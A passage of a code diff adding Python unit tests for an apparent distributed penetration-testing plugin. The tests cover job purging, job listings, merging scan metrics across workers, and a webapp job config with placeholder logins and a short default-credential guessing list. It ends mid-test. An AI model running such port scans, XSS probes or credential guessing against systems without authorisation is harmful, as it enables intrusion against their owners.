# Normalize returns the specs as-is + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Verify all 5 CIDs were deleted + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-archive", "cid-config", "cid-agg-1", "cid-wr-A", "cid-wr-B"}) + self.assertEqual(result["cids_deleted"], 5) + self.assertEqual(result["cids_total"], 5) + triage_deletes = { + (c.kwargs["hkey"], c.kwargs["key"]) + for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("value") is None and c.kwargs.get("hkey", "").endswith(":triage") + } + self.assertEqual(triage_deletes, {("test-instance:triage", "job-1:f-1")}) + triage_audit_deletes = { + (c.kwargs["hkey"], c.kwargs["key"]) + for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("value") is None and c.kwargs.get("hkey", "").endswith(":triage:audit") + } + self.assertEqual(triage_audit_deletes, {("test-instance:triage:audit", "job-1:f-1")}) + + def test_purge_finalized_no_pass_report_cids(self): + """Finalized purge does NOT try to delete individual pass report CIDs (they are inside archive).""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + # No pass_reports key — finalized stubs don't have them + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.side_effect = [ + {}, + {"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}}, + {"job-1:f-1": [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 1.0}]}, + ] + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Only archive CID should be deleted (no pass_reports, no config, no workers) + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-archive"}) + + def test_purge_running_collects_all_cids(self): + """Stopped (was running) purge collects config + worker CIDs + pass report CIDs + nested CIDs.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "STOPPED", + "job_config_cid": "cid-config", + "workers": { + "node-A": {"finished": True, "canceled": True, "report_cid": "cid-wr-A"}, + }, + "pass_reports": [ + {"report_cid": "cid-pass-1"}, + ], + } + plugin.chainstore_hget.return_value = job_specs + + # Pass report contains nested CIDs + pass_report = { + "aggregated_report_cid": "cid-agg-1", + "worker_reports": { + "node-A": {"report_cid": "cid-pass-wr-A"}, + }, + } + plugin.r1fs.get_json.return_value = pass_report + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.return_value = {} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-config", "cid-wr-A", "cid-pass-1", "cid-agg-1", "cid-pass-wr-A"}) + + def test_purge_r1fs_failure_keeps_cstore(self): + """Partial R1FS failure leaves CStore intact and returns 'partial' status.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + "job_config_cid": "cid-config", + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + + # First CID deletes ok, second raises + plugin.r1fs.delete_file.side_effect = [True, Exception("disk error")] + + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "partial") + self.assertEqual(result["cids_deleted"], 1) + self.assertEqual(result["cids_failed"], 1) + self.assertEqual(result["cids_total"], 2) + + # CStore should NOT be tombstoned + tombstone_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("value") is None + ] + self.assertEqual(len(tombstone_calls), 0) + + def test_purge_cleans_live_progress(self): + """Purge deletes live progress keys for the job from :live hset.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "STOPPED", + "workers": {"node-A": {"finished": True}}, + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.delete_file.return_value = True + + # Live hset has keys for this job and another + plugin.chainstore_hgetall.return_value = { + "job-1:node-A": {"progress": 100}, + "job-1:node-B": {"progress": 50}, + "job-2:node-C": {"progress": 30}, + } + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Check that live progress keys for job-1 were deleted + live_delete_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance:live" and c.kwargs.get("value") is None + ] + deleted_keys = {c.kwargs["key"] for c in live_delete_calls} + self.assertEqual(deleted_keys, {"job-1:node-A", "job-1:node-B"}) + # job-2 key should NOT be touched + self.assertNotIn("job-2:node-C", deleted_keys) + + def test_purge_success_tombstones_cstore(self): + """After all CIDs deleted, CStore key is tombstoned (set to None).""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.return_value = {} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # CStore tombstone: hset(hkey=instance_id, key=job_id, value=None) + tombstone_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" + and c.kwargs.get("key") == "job-1" + and c.kwargs.get("value") is None + ] + self.assertEqual(len(tombstone_calls), 1) + + def test_stop_and_delete_delegates_to_purge(self): + """stop_and_delete_job marks job stopped then delegates to purge_job.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + plugin.scan_jobs = {} + + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "workers": {"node-A": {"finished": False}}, + } + plugin.chainstore_hget.return_value = job_specs + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + # Mock purge_job to verify delegation + purge_result = {"status": "success", "job_id": "job-1", "cids_deleted": 3, "cids_total": 3} + plugin.purge_job = MagicMock(return_value=purge_result) + + result = Plugin.stop_and_delete_job(plugin, "job-1") + + # Verify job was marked stopped before purge + hset_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("key") == "job-1" + ] + self.assertEqual(len(hset_calls), 1) + saved_specs = hset_calls[0].kwargs["value"] + self.assertEqual(saved_specs["job_status"], "STOPPED") + self.assertTrue(saved_specs["workers"]["node-A"]["finished"]) + self.assertTrue(saved_specs["workers"]["node-A"]["canceled"]) + + # Verify purge was called + plugin.purge_job.assert_called_once_with("job-1") + self.assertEqual(result, purge_result) + + + +class TestPhase15Listing(unittest.TestCase): + """Phase 15: Listing Endpoint Optimization.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_list_finalized_returns_stub_fields(self): + """Finalized jobs return exact CStoreJobFinalized fields.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + finalized_stub = { + "job_id": "job-1", + "job_status": "FINALIZED", + "target": "10.0.0.1", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "scan-1", + "risk_score": 75, + "run_mode": "SINGLEPASS", + "duration": 120.5, + "pass_count": 1, + "launcher": "0xLauncher", + "launcher_alias": "node1", + "worker_count": 2, + "start_port": 1, + "end_port": 1024, + "date_created": 1700000000.0, + "date_completed": 1700000120.0, + "job_cid": "QmArchive123", + "job_config_cid": "QmConfig456", + } + plugin.chainstore_hgetall.return_value = {"job-1": finalized_stub} + plugin._normalize_job_record = MagicMock(return_value=("job-1", finalized_stub)) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("job-1", result) + entry = result["job-1"] + + # All CStoreJobFinalized fields present + self.assertEqual(entry["job_id"], "job-1") + self.assertEqual(entry["job_status"], "FINALIZED") + self.assertEqual(entry["job_cid"], "QmArchive123") + self.assertEqual(entry["job_config_cid"], "QmConfig456") + self.assertEqual(entry["scan_type"], "webapp") + self.assertEqual(entry["target_url"], "https://example.com/app") + self.assertEqual(entry["target"], "10.0.0.1") + self.assertEqual(entry["risk_score"], 75) + self.assertEqual(entry["duration"], 120.5) + self.assertEqual(entry["pass_count"], 1) + self.assertEqual(entry["worker_count"], 2) + + def test_list_running_stripped(self): + """Running jobs have listing fields but no heavy data.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + running_spec = { + "job_id": "job-2", + "job_status": "RUNNING", + "target": "10.0.0.2", + "scan_type": "webapp", + "target_url": "https://example.com/live", + "task_name": "scan-2", + "risk_score": 0, + "run_mode": "CONTINUOUS_MONITORING", + "start_port": 1, + "end_port": 65535, + "date_created": 1700000000.0, + "launcher": "0xLauncher", + "launcher_alias": "node1", + "job_pass": 3, + "job_config_cid": "QmConfig789", + "workers": { + "addr-A": {"start_port": 1, "end_port": 32767, "finished": False, "report_cid": "QmBigReport1"}, + "addr-B": {"start_port": 32768, "end_port": 65535, "finished": False, "report_cid": "QmBigReport2"}, + }, + "timeline": [ + {"event": "created", "ts": 1700000000.0}, + {"event": "started", "ts": 1700000001.0}, + ], + "pass_reports": [ + {"pass_nr": 1, "report_cid": "QmPass1"}, + {"pass_nr": 2, "report_cid": "QmPass2"}, + ], + "redmesh_job_start_attestation": {"big": "blob"}, + } + plugin.chainstore_hgetall.return_value = {"job-2": running_spec} + plugin._normalize_job_record = MagicMock(return_value=("job-2", running_spec)) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("job-2", result) + entry = result["job-2"] + + # Listing essentials present + self.assertEqual(entry["job_id"], "job-2") + self.assertEqual(entry["job_status"], "RUNNING") + self.assertEqual(entry["target"], "10.0.0.2") + self.assertEqual(entry["scan_type"], "webapp") + self.assertEqual(entry["target_url"], "https://example.com/live") + self.assertEqual(entry["task_name"], "scan-2") + self.assertEqual(entry["run_mode"], "CONTINUOUS_MONITORING") + self.assertEqual(entry["job_pass"], 3) + self.assertEqual(entry["worker_count"], 2) + self.assertEqual(entry["pass_count"], 2) + + # Heavy fields stripped + self.assertNotIn("workers", entry) + self.assertNotIn("timeline", entry) + self.assertNotIn("pass_reports", entry) + self.assertNotIn("redmesh_job_start_attestation", entry) + self.assertNotIn("job_config_cid", entry) + self.assertNotIn("report_cid", entry) + + + +class TestPhase16ScanMetrics(unittest.TestCase): + """Phase 16: Scan Metrics Collection.""" + + def test_metrics_collector_empty_build(self): + """build() with zero data returns ScanMetrics with defaults, no crash.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + result = mc.build() + d = result.to_dict() + self.assertEqual(d.get("total_duration", 0), 0) + self.assertEqual(d.get("rate_limiting_detected", False), False) + self.assertEqual(d.get("blocking_detected", False), False) + # No crash, sparse output + self.assertNotIn("connection_outcomes", d) + self.assertNotIn("response_times", d) + + def test_metrics_collector_records_connections(self): + """After recording outcomes, connection_outcomes has correct counts.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(100) + mc.record_connection("connected", 0.05) + mc.record_connection("connected", 0.03) + mc.record_connection("timeout", 1.0) + mc.record_connection("refused", 0.01) + d = mc.build().to_dict() + outcomes = d["connection_outcomes"] + self.assertEqual(outcomes["connected"], 2) + self.assertEqual(outcomes["timeout"], 1) + self.assertEqual(outcomes["refused"], 1) + self.assertEqual(outcomes["total"], 4) + # Response times computed + rt = d["response_times"] + self.assertIn("mean", rt) + self.assertIn("p95", rt) + self.assertEqual(rt["count"], 4) + + def test_metrics_collector_records_probes(self): + """After recording probes, probe_breakdown has entries.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.record_probe("_service_info_http", "completed") + mc.record_probe("_service_info_ssh", "completed") + mc.record_probe("_web_test_xss", "skipped:no_http") + d = mc.build().to_dict() + self.assertEqual(d["probes_attempted"], 3) + self.assertEqual(d["probes_completed"], 2) + self.assertEqual(d["probes_skipped"], 1) + self.assertEqual(d["probe_breakdown"]["_service_info_http"], "completed") + self.assertEqual(d["probe_breakdown"]["_web_test_xss"], "skipped:no_http") + + def test_metrics_collector_phase_durations(self): + """start/end phases produce positive durations.""" + import time + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.phase_start("port_scan") + time.sleep(0.01) + mc.phase_end("port_scan") + d = mc.build().to_dict() + self.assertIn("phase_durations", d) + self.assertGreater(d["phase_durations"]["port_scan"], 0) + + def test_metrics_collector_findings(self): + """record_finding tracks severity distribution.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.record_finding("HIGH") + mc.record_finding("HIGH") + mc.record_finding("MEDIUM") + mc.record_finding("INFO") + d = mc.build().to_dict() + fd = d["finding_distribution"] + self.assertEqual(fd["HIGH"], 2) + self.assertEqual(fd["MEDIUM"], 1) + self.assertEqual(fd["INFO"], 1) + + def test_metrics_collector_coverage(self): + """Coverage tracks ports scanned vs in range.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(100) + for i in range(50): + mc.record_connection("connected" if i < 5 else "refused", 0.01) + # Simulate finding 5 open ports with banner confirmation + for i in range(5): + mc.record_open_port(8000 + i, protocol="http" if i < 3 else "ssh", banner_confirmed=(i < 3)) + d = mc.build().to_dict() + cov = d["coverage"] + self.assertEqual(cov["ports_in_range"], 100) + self.assertEqual(cov["ports_scanned"], 50) + self.assertEqual(cov["coverage_pct"], 50.0) + self.assertEqual(cov["open_ports_count"], 5) + # Open port details + self.assertEqual(len(d["open_port_details"]), 5) + self.assertEqual(d["open_port_details"][0]["port"], 8000) + self.assertEqual(d["open_port_details"][0]["protocol"], "http") + self.assertTrue(d["open_port_details"][0]["banner_confirmed"]) + self.assertFalse(d["open_port_details"][3]["banner_confirmed"]) + # Banner confirmation + self.assertEqual(d["banner_confirmation"]["confirmed"], 3) + self.assertEqual(d["banner_confirmation"]["guessed"], 2) + + def test_scan_metrics_model_roundtrip(self): + """ScanMetrics.from_dict(sm.to_dict()) preserves all fields.""" + from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics + sm = ScanMetrics( + phase_durations={"port_scan": 10.5, "fingerprint": 3.2}, + total_duration=15.0, + connection_outcomes={"connected": 50, "timeout": 5, "total": 55}, + response_times={"min": 0.01, "max": 1.0, "mean": 0.1, "median": 0.08, "stddev": 0.05, "p95": 0.5, "p99": 0.9, "count": 55}, + rate_limiting_detected=True, + blocking_detected=False, + coverage={"ports_in_range": 1000, "ports_scanned": 1000, "ports_skipped": 0, "coverage_pct": 100.0}, + probes_attempted=5, + probes_completed=4, + probes_skipped=1, + probes_failed=0, + probe_breakdown={"_service_info_http": "completed"}, + finding_distribution={"HIGH": 3, "MEDIUM": 2}, + ) + d = sm.to_dict() + sm2 = ScanMetrics.from_dict(d) + self.assertEqual(sm2.to_dict(), d) + + def test_scan_metrics_strip_none(self): + """Empty/None fields stripped from serialization.""" + from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics + sm = ScanMetrics() + d = sm.to_dict() + self.assertNotIn("phase_durations", d) + self.assertNotIn("connection_outcomes", d) + self.assertNotIn("response_times", d) + self.assertNotIn("slow_ports", d) + self.assertNotIn("probe_breakdown", d) + + def test_merge_worker_metrics(self): + """_merge_worker_metrics sums outcomes, coverage, findings; maxes duration; ORs flags.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + m1 = { + "connection_outcomes": {"connected": 30, "timeout": 5, "total": 35}, + "coverage": {"ports_in_range": 500, "ports_scanned": 500, "ports_skipped": 0, "coverage_pct": 100.0, "open_ports_count": 3}, + "finding_distribution": {"HIGH": 2, "MEDIUM": 1}, + "service_distribution": {"http": 2, "ssh": 1}, + "probe_breakdown": {"_service_info_http": "completed", "_web_test_xss": "completed"}, + "phase_durations": {"port_scan": 30.0, "fingerprint": 10.0, "service_probes": 15.0}, + "response_times": {"min": 0.01, "max": 0.5, "mean": 0.05, "median": 0.04, "stddev": 0.03, "p95": 0.2, "p99": 0.4, "count": 500}, + "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, + "total_duration": 60.0, + "rate_limiting_detected": False, "blocking_detected": False, + "open_port_details": [ + {"port": 22, "protocol": "ssh", "banner_confirmed": True}, + {"port": 80, "protocol": "http", "banner_confirmed": True}, + {"port": 443, "protocol": "http", "banner_confirmed": False}, + ], + "banner_confirmation": {"confirmed": 2, "guessed": 1}, + } + m2 = { + "connection_outcomes": {"connected": 20, "timeout": 10, "total": 30}, + "coverage": {"ports_in_range": 500, "ports_scanned": 400, "ports_skipped": 100, "coverage_pct": 80.0, "open_ports_count": 2}, + "finding_distribution": {"HIGH": 1, "LOW": 3}, + "service_distribution": {"http": 1, "mysql": 1}, + "probe_breakdown": {"_service_info_http": "completed", "_service_info_mysql": "completed", "_web_test_xss": "failed"}, + "phase_durations": {"port_scan": 45.0, "fingerprint": 8.0, "service_probes": 20.0}, + "response_times": {"min": 0.02, "max": 0.8, "mean": 0.08, "median": 0.06, "stddev": 0.05, "p95": 0.3, "p99": 0.7, "count": 400}, + "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 1, "probes_failed": 0, + "total_duration": 75.0, + "rate_limiting_detected": True, "blocking_detected": False, + "open_port_details": [ + {"port": 80, "protocol": "http", "banner_confirmed": True}, # duplicate port 80 + {"port": 3306, "protocol": "mysql", "banner_confirmed": True}, + ], + "banner_confirmation": {"confirmed": 2, "guessed": 0}, + } + merged = PentesterApi01Plugin._merge_worker_metrics([m1, m2]) + # Sums + self.assertEqual(merged["connection_outcomes"]["connected"], 50) + self.assertEqual(merged["connection_outcomes"]["timeout"], 15) + self.assertEqual(merged["connection_outcomes"]["total"], 65) + self.assertEqual(merged["coverage"]["ports_in_range"], 1000) + self.assertEqual(merged["coverage"]["ports_scanned"], 900) + self.assertEqual(merged["coverage"]["ports_skipped"], 100) + self.assertEqual(merged["coverage"]["coverage_pct"], 90.0) + self.assertEqual(merged["coverage"]["open_ports_count"], 5) + self.assertEqual(merged["finding_distribution"]["HIGH"], 3) + self.assertEqual(merged["finding_distribution"]["LOW"], 3) + self.assertEqual(merged["finding_distribution"]["MEDIUM"], 1) + self.assertEqual(merged["probes_attempted"], 6) + self.assertEqual(merged["probes_completed"], 5) + self.assertEqual(merged["probes_skipped"], 1) + # Service distribution summed + self.assertEqual(merged["service_distribution"]["http"], 3) + self.assertEqual(merged["service_distribution"]["ssh"], 1) + self.assertEqual(merged["service_distribution"]["mysql"], 1) + # Probe breakdown: union, worst status wins + self.assertEqual(merged["probe_breakdown"]["_service_info_http"], "completed") + self.assertEqual(merged["probe_breakdown"]["_service_info_mysql"], "completed") + self.assertEqual(merged["probe_breakdown"]["_web_test_xss"], "failed") # failed > completed + # Phase durations: max per phase (threads/nodes run in parallel) + self.assertEqual(merged["phase_durations"]["port_scan"], 45.0) + self.assertEqual(merged["phase_durations"]["fingerprint"], 10.0) + self.assertEqual(merged["phase_durations"]["service_probes"], 20.0) + # Response times: merged stats + rt = merged["response_times"] + self.assertEqual(rt["min"], 0.01) # global min + self.assertEqual(rt["max"], 0.8) # global max + self.assertEqual(rt["count"], 900) # total count + # Weighted mean: (0.05*500 + 0.08*400) / 900 ≈ 0.0633 + self.assertAlmostEqual(rt["mean"], 0.0633, places=3) + self.assertEqual(rt["p95"], 0.3) # max of per-thread p95 + self.assertEqual(rt["p99"], 0.7) # max of per-thread p99 + # Max duration + self.assertEqual(merged["total_duration"], 75.0) + # OR flags + self.assertTrue(merged["rate_limiting_detected"]) + self.assertFalse(merged["blocking_detected"]) + # Open port details: deduplicated by port, sorted + opd = merged["open_port_details"] + self.assertEqual(len(opd), 4) # 22, 80, 443, 3306 (80 deduplicated) + self.assertEqual(opd[0]["port"], 22) + self.assertEqual(opd[1]["port"], 80) + self.assertEqual(opd[2]["port"], 443) + self.assertEqual(opd[3]["port"], 3306) + # Banner confirmation: summed + self.assertEqual(merged["banner_confirmation"]["confirmed"], 4) + self.assertEqual(merged["banner_confirmation"]["guessed"], 1) + + + def test_close_job_merges_thread_metrics(self): + """16b: _close_job replaces generically-merged scan_metrics with properly summed metrics.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + + # Two mock workers with different scan_metrics + worker1 = MagicMock() + worker1.get_status.return_value = { + "open_ports": [80], "service_info": {}, "scan_metrics": { + "connection_outcomes": {"connected": 10, "timeout": 2, "total": 12}, + "total_duration": 30.0, + "probes_attempted": 2, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 0, + "rate_limiting_detected": False, "blocking_detected": False, + } + } + worker2 = MagicMock() + worker2.get_status.return_value = { + "open_ports": [443], "service_info": {}, "scan_metrics": { + "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, + "total_duration": 45.0, + "probes_attempted": 2, "probes_completed": 1, "probes_skipped": 1, "probes_failed": 0, + "rate_limiting_detected": True, "blocking_detected": False, + } + } + plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} + + # _get_aggregated_report with merge_objects_deep would do last-writer-wins on leaf ints + # Simulate that by returning worker2's metrics (wrong — should be summed) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, + "scan_metrics": { + "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, + "total_duration": 45.0, + } + }) + # Use real static method for merge + plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics + + saved_reports = [] + def capture_add_json(data, show_logs=False): + saved_reports.append(data) + return "QmReport123" + plugin.r1fs.add_json.side_effect = capture_add_json + + job_specs = {"job_id": "job-1", "target": "10.0.0.1", "workers": {}} + plugin.chainstore_hget.return_value = job_specs + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) + plugin._redact_report = MagicMock(side_effect=lambda r: r) + + PentesterApi01Plugin._close_job(plugin, "job-1") + + # The report saved to R1FS should have properly merged metrics + self.assertEqual(len(saved_reports), 1) + sm = saved_reports[0].get("scan_metrics") + self.assertIsNotNone(sm) + # Connection outcomes should be summed, not last-writer-wins + self.assertEqual(sm["connection_outcomes"]["connected"], 18) + self.assertEqual(sm["connection_outcomes"]["timeout"], 7) + self.assertEqual(sm["connection_outcomes"]["total"], 25) + # Max duration + self.assertEqual(sm["total_duration"], 45.0) + # Probes summed + self.assertEqual(sm["probes_attempted"], 4) + self.assertEqual(sm["probes_completed"], 3) + # OR flags + self.assertTrue(sm["rate_limiting_detected"]) + + def test_finalize_pass_attaches_pass_metrics(self): + """16c: _maybe_finalize_pass merges node metrics into PassReport.scan_metrics.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_llm_agent = {"ENABLED": False} + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 3600, "RETRIES": 2} + + # Two workers, each with a report_cid + workers = { + "node-A": {"finished": True, "report_cid": "cid-report-A"}, + "node-B": {"finished": True, "report_cid": "cid-report-B"}, + } + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "target": "10.0.0.1", + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "workers": workers, + "job_pass": 1, + "pass_reports": [], + "timeline": [{"event": "created", "ts": 1700000000.0}], + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + plugin.time.return_value = 1700000120.0 + + # Node reports with different metrics + node_report_a = { + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "correlation_findings": [], "start_port": 1, "end_port": 32767, + "ports_scanned": 32767, + "scan_metrics": { + "connection_outcomes": {"connected": 5, "timeout": 1, "total": 6}, + "total_duration": 50.0, + "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, + "rate_limiting_detected": False, "blocking_detected": False, + } + } + node_report_b = { + "open_ports": [443], "service_info": {}, "web_tests_info": {}, + "correlation_findings": [], "start_port": 32768, "end_port": 65535, + "ports_scanned": 32768, + "scan_metrics": { + "connection_outcomes": {"connected": 3, "timeout": 4, "total": 7}, + "total_duration": 65.0, + "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 1, + "rate_limiting_detected": False, "blocking_detected": True, + } + } + + node_reports_by_addr = {"node-A": node_report_a, "node-B": node_report_b} + plugin._collect_node_reports = MagicMock(return_value=node_reports_by_addr) + # _get_aggregated_report would use merge_objects_deep (wrong for metrics) + # Return a dict with last-writer-wins metrics to simulate the bug + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, + "scan_metrics": node_report_b["scan_metrics"], # wrong — just node B's + }) + # Use real static method for merge + plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics + + # Capture what gets saved as pass report + saved_pass_reports = [] + def capture_add_json(data, show_logs=False): + saved_pass_reports.append(data) + return f"QmPassReport{len(saved_pass_reports)}" + plugin.r1fs.add_json.side_effect = capture_add_json + + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) + plugin._get_job_config = MagicMock(return_value={}) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._emit_timeline_event = MagicMock() + plugin._get_timeline_date = MagicMock(return_value=1700000000.0) + plugin.Pd = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # Should have saved: aggregated_data (step 6) + pass_report (step 10) + self.assertGreaterEqual(len(saved_pass_reports), 2) + pass_report = saved_pass_reports[-1] # Last one is the PassReport + + sm = pass_report.get("scan_metrics") + self.assertIsNotNone(sm, "PassReport should have scan_metrics") + # Connection outcomes summed across nodes + self.assertEqual(sm["connection_outcomes"]["connected"], 8) + self.assertEqual(sm["connection_outcomes"]["timeout"], 5) + self.assertEqual(sm["connection_outcomes"]["total"], 13) + # Max duration + self.assertEqual(sm["total_duration"], 65.0) + # Probes summed + self.assertEqual(sm["probes_attempted"], 6) + self.assertEqual(sm["probes_completed"], 5) + self.assertEqual(sm["probes_failed"], 1) + # OR flags + self.assertFalse(sm["rate_limiting_detected"]) + self.assertTrue(sm["blocking_detected"]) diff --git a/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py b/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py new file mode 100644 index 00000000..fcdacff5 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py @@ -0,0 +1,255 @@ +"""Tests for JobConfig graybox fields and blackbox Finding unchanged.""" + +import unittest + +from extensions.business.cybersec.red_mesh.models.archive import JobConfig, UiAggregate +from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics +from extensions.business.cybersec.red_mesh.findings import Finding, Severity + + +class TestJobConfigWebapp(unittest.TestCase): + + def test_scan_type_default(self): + """scan_type defaults to 'network'.""" + cfg = JobConfig( + target="10.0.0.1", start_port=1, end_port=1024, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=2, + enabled_features=[], excluded_features=[], + run_mode="SINGLEPASS", + ) + self.assertEqual(cfg.scan_type, "network") + + def test_from_dict_with_graybox_fields(self): + """Round-trip with all graybox fields.""" + d = { + "target": "example.com", + "start_port": 1, + "end_port": 65535, + "exceptions": [], + "distribution_strategy": "SLICE", + "port_order": "SEQUENTIAL", + "nr_local_workers": 1, + "enabled_features": [], + "excluded_features": [], + "run_mode": "SINGLEPASS", + "scan_type": "webapp", + "target_url": "https://example.com/", + "official_username": "admin", + "official_password": "secret123", + "regular_username": "user", + "regular_password": "pass456", + "weak_candidates": ["admin:admin", "test:test"], + "max_weak_attempts": 10, + "app_routes": ["/api/users/", "/api/records/"], + "verify_tls": False, + "target_config": {"login_path": "/login/"}, + "allow_stateful_probes": True, + } + cfg = JobConfig.from_dict(d) + self.assertEqual(cfg.scan_type, "webapp") + self.assertEqual(cfg.target_url, "https://example.com/") + self.assertEqual(cfg.official_username, "admin") + self.assertEqual(cfg.official_password, "secret123") + self.assertEqual(cfg.regular_username, "user") + self.assertEqual(cfg.regular_password, "pass456") + self.assertEqual(cfg.weak_candidates, ["admin:admin", "test:test"]) + self.assertEqual(cfg.max_weak_attempts, 10) + self.assertEqual(cfg.app_routes, ["/api/users/", "/api/records/"]) + self.assertFalse(cfg.verify_tls) + self.assertEqual(cfg.target_config, {"login_path": 